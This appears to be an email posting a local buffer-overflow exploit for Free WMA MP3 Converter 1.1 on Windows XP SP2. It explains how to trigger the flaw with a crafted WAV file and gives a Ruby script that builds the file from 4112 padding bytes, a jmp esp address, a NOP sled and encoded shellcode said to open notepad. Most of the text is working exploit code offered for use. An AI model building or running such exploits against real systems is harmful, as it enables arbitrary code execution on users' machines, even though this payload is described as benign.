sorry was missing some text from my previous email # Exploit Title: Free WMA MP3 Converter # Date: 02/04/2010 # Author: Richard leahy # Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210 # Version: 1.1 # Tested on: Windows Xp Sp2 #category local exploit to trigger vulnrability open up application choose wav to mp3 load the specially crafted wav file and click convert. Probably works for all the other options too eg mp3 to wav etc. run the code below and pipe it into a .wav file #code !#/usr/bin/env ruby nop = "\x90" #imagehlp jmp_esp = [0x76cafa32].pack('V') #shellcode opens notepad shellcode = "\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" + "\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" + "\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" + "\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" + "\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" + "\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" + "\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" + "\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" + "\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" + "\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" + "\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" + "\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" + "\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" + "\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" + "\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" + "\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" + "\x2a\x67\xec" boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode puts boom ________________________________ Hotmail: Free, trusted and rich email service. Get it now.